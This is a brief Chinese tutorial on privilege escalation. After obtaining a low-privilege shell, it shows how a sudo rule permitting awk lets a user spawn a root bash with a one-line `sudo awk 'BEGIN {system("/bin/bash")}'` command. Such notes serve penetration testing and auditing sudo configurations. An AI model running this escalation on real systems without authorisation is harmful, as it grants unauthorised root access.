当渗透进系统并获得一个低权限shell后
如果当前允许当前用户通过sudo执行awk命令,可以通过如下方式进行提权
1、测试是否可以通过sudo执行awk命令
test1@kali:/root$ sudo awk
可以看到出现了awk命令的帮助文档,说明可以通过sudo执行awk命令
2、开始提权
test1@kali:/root$ sudo awk 'BEGIN {system("/bin/bash")}'
发现已经成功提权
